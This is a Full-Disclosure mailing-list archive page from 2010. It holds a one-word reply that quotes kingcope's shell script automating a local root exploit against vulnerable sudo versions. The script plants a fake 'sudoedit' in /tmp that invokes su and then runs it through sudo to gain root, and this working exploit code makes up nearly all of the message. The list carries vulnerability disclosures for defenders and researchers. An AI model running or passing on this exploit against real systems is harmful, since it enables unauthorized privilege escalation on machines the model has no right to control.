[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Todd Miller Sudo local root exploit discovered by Slouching

To: unlisted-recipients:; (no To-header on input)
Subject: Re: [Full-disclosure] Todd Miller Sudo local root exploit discovered by Slouching
From: root <root_@xxxxxxxxxxxxxxx>
Date: Mon, 01 Mar 2010 20:47:15 -0300

Malisimo

Kingcope wrote:
> Just for the record.
> 
> ---snip---
> #!/bin/sh
> # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
> # local root exploit
> # March 2010
> # automated by kingcope
> # Full Credits to Slouching
> echo Tod Miller Sudo local root exploit
> echo by Slouching
> echo automated by kingcope
> if [ $# != 1 ]
> then
> echo "usage: ./sudoxpl.sh <file you have permission to edit>"
> exit
> fi
> cd /tmp
> cat > sudoedit << _EOF
> #!/bin/sh
> echo ALEX-ALEX
> su
> /bin/su
> /usr/bin/su
> _EOF
> chmod a+x ./sudoedit
> sudo ./sudoedit $1
> --snip---
> 
> cheers,
> kingcope
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] Todd Miller Sudo local root exploit discovered by Slouching
  - From: Kingcope

Prev by Date: Re: [Full-disclosure] Yahoo! UK and US Hiring Security and Risk management experts
Next by Date: Re: [Full-disclosure] Internet Exploiter 2 - bypassing DEP
Previous by thread: [Full-disclosure] Todd Miller Sudo local root exploit discovered by Slouching
Next by thread: Re: [Full-disclosure] Todd Miller Sudo local root exploit discovered by Slouching
Index(es):
- Date
- Thread